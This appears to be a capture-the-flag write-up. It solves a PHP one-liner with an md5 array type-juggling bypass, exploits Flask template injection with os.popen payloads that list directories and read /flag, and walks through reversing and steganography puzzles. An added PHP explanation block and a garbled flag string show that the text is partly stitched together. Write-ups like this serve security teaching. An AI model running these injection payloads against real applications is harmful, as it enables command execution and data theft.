Spring cup eight school league
2022-07-03 13:53:00 【Baita River surfer】
Original competition write-up: Tencent Docs
WEB
Topic 1: Sign in with a line of code
Source code:
<?php
// The whole sign-in challenge is a single line
echo !(!(include "flag.php")||(!error_reporting(0))||!isset($_GET['BYE'])||!isset($_GET['HELLO'])||($_GET['BYE']==2021)||!(intval($_GET['BYE'][0])==2021)||$_GET['HELLO']==$_GET['BYE']||!(md5($_GET['HELLO'])==md5($_GET['BYE'])))?$flag:str_repeat(highlight_file(__FILE__), 0);
Knowledge points:
intval(): returns the integer value of a variable.
md5 array bypass: md5() cannot hash an array. Passing an array raises an error, but execution continues and the return value is null.
Loose comparison (==): only checks whether the values are equal. If a value is a string, it is converted to a numeric type before the comparison.
Ternary operator: echo !(...) ? xxx : yyy. If the condition is true, xxx is echoed; if it is false, yyy is echoed.
|| chains the conditions together.
Analysis
The whole condition:
!(!(include "flag.php")||(!error_reporting(0))||!isset($_GET['BYE'])||!isset($_GET['HELLO'])||($_GET['BYE']==2021)||!(intval($_GET['BYE'][0])==2021)||$_GET['HELLO']==$_GET['BYE']||!(md5($_GET['HELLO'])==md5($_GET['BYE'])))
The whole condition must be true for the flag to be output. The bracketed expression is prefixed with !, so every condition inside the brackets must be false:
1. ($_GET['BYE']==2021) ==> BYE must not equal 2021
2. !(intval($_GET['BYE'][0])==2021) ==> the integer value of BYE must be 2021
3. $_GET['HELLO']==$_GET['BYE'] ==> HELLO and BYE must not be equal
4. !(md5($_GET['HELLO'])==md5($_GET['BYE'])) ==> append [] to HELLO and BYE so that both become arrays; the check becomes null == null and is bypassed
Payload:
?HELLO[]=2021A&BYE[]=2021a
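The clause-by-clause analysis above, as an added PHP example (not part of the challenge or of the original write-up). The $get array is constructed to match what PHP parses from the payload, and the function names looseClauses, flagWouldPrint and strictCheck are hypothetical. The example also covers PHP 8, where md5() on an array throws a TypeError instead of returning null, and shows input handling that rejects array parameters before any comparison.

```php
<?php
// Added example, not the challenge's own code. $get is constructed to match
// what PHP builds from the query string ?HELLO[]=2021A&BYE[]=2021a.
$get = ['HELLO' => ['2021A'], 'BYE' => ['2021a']];

// Evaluate the four value clauses of the one-liner separately (hypothetical helper).
function looseClauses(array $get): array
{
    [$hello, $bye] = [$get['HELLO'], $get['BYE']];
    try {
        // PHP 7: md5(array) warns and returns NULL on both sides, so NULL == NULL.
        $md5Equal = @md5($hello) == @md5($bye);
    } catch (TypeError $e) {
        // PHP 8: md5(array) throws, so the one-liner aborts before echoing $flag.
        $md5Equal = false;
    }
    return [
        'BYE == 2021'            => $bye == 2021,            // array vs int: not equal
        'intval(BYE[0]) == 2021' => intval($bye[0]) == 2021, // "2021a" becomes 2021
        'HELLO == BYE'           => $hello == $bye,          // "2021A" vs "2021a"
        'md5(HELLO) == md5(BYE)' => $md5Equal,
    ];
}

// The flag is echoed only when clauses 1 and 3 are false and 2 and 4 are true.
function flagWouldPrint(array $c): bool
{
    return !$c['BYE == 2021'] && $c['intval(BYE[0]) == 2021']
        && !$c['HELLO == BYE'] && $c['md5(HELLO) == md5(BYE)'];
}

// Hardened handling: accept only string parameters and compare without juggling.
function strictCheck(array $get): string
{
    foreach (['HELLO', 'BYE'] as $key) {
        if (!isset($get[$key]) || !is_string($get[$key])) {
            return "rejected: $key is not a string"; // e.g. BYE[]=... arrives as array
        }
    }
    return hash_equals(md5($get['HELLO']), md5($get['BYE'])) ? 'digests match' : 'digests differ';
}

$clauses = looseClauses($get);
foreach ($clauses as $name => $value) {
    echo str_pad($name, 24), var_export($value, true), PHP_EOL;
}
echo 'loose check echoes flag: ', var_export(flagWouldPrint($clauses), true), PHP_EOL;
echo 'strict check: ', strictCheck($get), PHP_EOL;
```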
Topic two: e4zy_flask
Hint: /admin?name=1 https://xz.aliyun.com/t/8029#toc-8
Enter the page
Go to the admin page
/admin
Passing a GET parameter reveals SSTI
/admin?name=49
Look at the root directory
admin/?name={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}}
A flag file is found
?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20/flag%27).read()%20}}
Flag:
flag{SST1_YoU_kNow_1t_A1way5_5O_Easy}
Topic three baby_SQL
Topic four TP_serialize
REVERSE
Topic 1: RE Check In
Open flag.exe in IDA; the main function contains a string
Base64-decode it to get the flag
Topic two Easy RE
Topic three Dynamic Reverse
MISC
Topic 1: Enjoy the wonderful music
Unzip the file to get a WAV audio file and a compressed archive. The archive is password-protected, so look at the audio first
Open it in Audacity: nothing
It turns out to be SSTV, which decodes to a picture. Switch the output device first, then run the SSTV decoder again
The words on the picture, “I knocked CP It's the sweetest !”, are the archive password. Extract the audio
It is a song. Open it in Audacity: again nothing
A file is probably hidden in it. DeepSound finds a txt file inside
Opening it shows a zero at the end and a large number of columns, so it should be zero-width steganography
Decoding it with an online decoder gives the flag
Topic two: Super simple
Piece the QR code together in PS (Photoshop) and scan it to get a string of characters
V20xNGFGb3pkSE5qTVRoNFpFWTVlbVJZUW14amJEbDZZVmN4ZDJKSFZTOW1VVDA5
Base64-decode three times to get the flag: flag{ls_1t_super_simple?}
Topic three: Have a set meal
Unzip the file to get hint.txt and a password-protected archive
hint.txt looks like a dictionary for brute-forcing the archive password, so try it
The brute force succeeds; extract the archive
Bacon cipher
The uppercase decoding fails as the archive password; the lowercase one succeeds: tiersxqxyhdcbsnervfy
Extract the archive
Ook decoding
Extracting gives a picture
Open it in 010 Editor and look inside
Look at the properties to find the flag: flag{He110_everyone_1m#[email protected]_Amway}
Topic four Today is also a day to love ah Yao